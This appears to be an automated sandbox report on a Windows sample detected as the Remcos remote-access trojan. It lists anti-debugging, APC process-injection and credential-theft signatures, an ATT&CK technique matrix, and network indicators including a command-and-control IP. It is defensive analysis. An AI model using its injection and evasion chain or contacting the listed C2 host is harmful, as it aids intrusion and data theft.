            Source: powershell.exe, 00000001.00000002.2281239821.00000000058F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\eq
            Source: powershell.exe, 00000001.00000002.2281239821.00000000058F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\eq
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
            Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeAPI call chain: ExitProcess graph end nodegraph_0-2865
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeAPI call chain: ExitProcess graph end nodegraph_0-3044
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 42C0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagervQR
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerR
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406072

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7060, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GC7VQUJump to behavior
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7060, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            11
            Masquerading
            OS Credential Dumping211
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts312
            Process Injection
            131
            Virtualization/Sandbox Evasion
            LSASS Memory2
            Process Discovery
            Remote Desktop Protocol1
            Clipboard Data
            1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Access Token Manipulation
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Remote Access Software
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture1
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing
            Cached Domain Credentials14
            System Information Discovery
            VNCGUI Input Capture113
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588308 Sample: WtZl31OLfA.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 36 drive.usercontent.google.com 2->36 38 drive.google.com 2->38 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 8 other signatures 2->50 8 WtZl31OLfA.exe 30 2->8         started        signatures3 process4 file5 22 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\Local\...\Kbmand.Too, Unicode 8->24 dropped 52 Suspicious powershell command line found 8->52 12 powershell.exe 30 8->12         started        signatures6 process7 file8 26 C:\Users\user\AppData\...\WtZl31OLfA.exe, PE32 12->26 dropped 28 C:\Users\...\WtZl31OLfA.exe:Zone.Identifier, ASCII 12->28 dropped 54 Early bird code injection technique detected 12->54 56 Writes to foreign memory regions 12->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 12->58 60 3 other signatures 12->60 16 msiexec.exe 3 6 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 87.120.116.187, 49440, 49457, 49473 UNACS-AS-BG8000BurgasBG Bulgaria 16->30 32 drive.google.com 142.250.185.78, 443, 49396 GOOGLEUS United States 16->32 34 drive.usercontent.google.com 172.217.16.129, 443, 49406 GOOGLEUS United States 16->34 40 Detected Remcos RAT 16->40 42 Hides threads from debuggers 16->42 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            WtZl31OLfA.exe58%ReversingLabsWin32.Backdoor.Remcos
